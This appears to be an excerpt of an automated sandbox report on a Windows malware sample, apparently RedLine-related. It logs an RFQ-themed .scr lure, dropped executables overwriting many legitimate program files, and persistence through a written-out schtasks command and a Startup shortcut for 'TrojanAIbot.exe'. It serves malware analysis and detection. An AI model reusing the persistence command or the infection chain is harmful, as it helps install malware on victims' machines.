Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\microsofts.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	File created: C:\Users\user\AppData\Local\Temp\build.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:46 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_052ACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

3_2_052ACBD0

Hooking and other Techniques for Hiding and Protection

Creates files inside the volume driver (system volume information)

Source: C:\Windows\System32\TieringEngineService.exe

File created: C:\System Volume Information\Heat\

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_004772DE
